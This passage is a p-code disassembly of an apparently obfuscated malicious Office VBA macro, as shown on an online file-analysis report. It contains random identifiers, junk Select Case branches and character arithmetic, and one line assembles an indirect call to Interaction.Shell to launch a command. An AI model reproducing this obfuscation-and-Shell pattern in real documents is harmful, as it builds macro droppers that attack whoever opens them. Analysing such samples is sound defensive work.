' Line #157:
' LitDI4 0x6332 0x08E6
' LitDI4 0xD6B7 0x1004
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St vqBQCmMWmlcHhiCoKQDlhzU
' Line #158:
' Ld XSqmGdCQcVtTLvVibw
' St aUijzGMmCcJWERK
' Line #159:
' LitDI4 0x566C 0x04D4
' Case
' CaseDone
' Line #160:
' LitDI4 0x3D1A 0x0B0E
' St oFnVvvbZfnMmaMcCfCzzSRE
' Line #161:
' LitDI4 0x065D 0x0B0C
' St taGGfuHETjRiVqLB
' Line #162:
' EndSelect
' Line #163:
' SetStmt
' Ld oIHswTTwZzPYWBLICUUTz
' Set taGGfuHETjRiVqLB
' Line #164:
' Ld JQSMoqjIlvDakSHvoOJUhqm
' ArgsLd Hex 0x0001
' St FhHjLYKLnvqjPTFAcnmjUJp
' Line #165:
' Ld DBshjSYvrMWuFwWzOivTQfQ
' SelectCase
' Line #166:
' LitDI4 0xB60C 0x0A50
' Case
' CaseDone
' Line #167:
' LitDI4 0xC93F 0x0192
' LitDI4 0xC7D8 0x0C6F
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St japnlEhwHhKNKBOjJf
' Line #168:
' Ld VhtjKbDRvMhnBRRjAqwK
' St CCawqbtldoPodFTDw
' Line #169:
' LitDI4 0x3F6E 0x10C3
' Case
' CaseDone
' Line #170:
' LitDI4 0xDB72 0x13C3
' St vTSSVjFiLmFAvuUJ
' Line #171:
' LitDI4 0xA87F 0x0355
' St PYcpRHcnLomCGHVUZOaRpr
' Line #172:
' EndSelect
' Line #173:
' SetStmt
' Ld wiaVGiZzXZuFrfojorOs
' Set kZbnGXwXKBhlhFCKqiYQw
' Line #174:
' Ld fBqokCKMnAKfBBj
' ArgsLd Hex 0x0001
' St ZjmTLPaGThmctd
' Line #175:
' Ld hQbYuoBuTwsDsIczCjB
' SelectCase
' Line #176:
' LitDI4 0xF0BB 0x1197
' Case
' CaseDone
' Line #177:
' LitDI4 0x049F 0x0B45
' LitDI4 0xBF90 0x023F
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St hMpoFOSkiDEowdSMdwR
' Line #178:
' Ld MQikiqhpMdJjNJH
' St aqKAEpsUicMBfjUtA
' Line #179:
' LitDI4 0xB50B 0x015D
' Case
' CaseDone
' Line #180:
' LitDI4 0x2FED 0x04C8
' St foAZZPDarnTwzTcTMl
' Line #181:
' LitDI4 0x1BAD 0x076F
' St IZVNHDHBSjnVZzN
' Line #182:
' EndSelect
' Line #183:
' SetStmt
' Ld RWHCILzzWwFQrfDGwAjdqW
' Set jhzMHsrWkrtAqUbFzNF
' Line #184:
' Ld rYOsnjwpYzBMYowuKsAj
' ArgsLd Hex 0x0001
' St OBcLLQblItoPLpKz
' Line #185:
' Ld qsGAVMTi
' Ld JmwzbSW
' Ld iXvNp
' Ld mYawR
' Ld WcRLwQaz
' Ld [rMFzvSbXl]
' ArgsMemLd Interaction 0x0002
' Ld Shell
' ArgsArray Array 0x0005
' St ohuNzXCQsQlBzm
' Line #186:
' Ld BqZSvWAD
' SelectCase
' Line #187:
' LitDI4 0xF009 0x0B62
' Case
' CaseDone
' Line #188:
' LitDI4 0xE281 0x0ECF
' LitDI4 0x5C48 0x0E79
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St vAaVpYkwuKzhwjYiiwWH
' Line #189:
' Ld zcScEGbCIaHcEz
' St ZTskZKErzqirFOBarLkHzv
' Line #190:
' LitDI4 0x87F6 0x0A33
' Case
' CaseDone
' Line #191:
' LitDI4 0xCF20 0x104B
' St tDNHzFbKcEFLWVpdhHj
' Line #192:
' LitDI4 0x613F 0x0D8E
' St mOtjGownuznMLOuiilvYS
' Line #193:
' EndSelect
' Line #194:
' SetStmt
' Ld RwLHuuDVoBPzrun
' Set zvEhTzZVUZsGoUXsQiW
' Line #195:
' Ld wGRhztZYCWAjXdJzajqJBfN
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.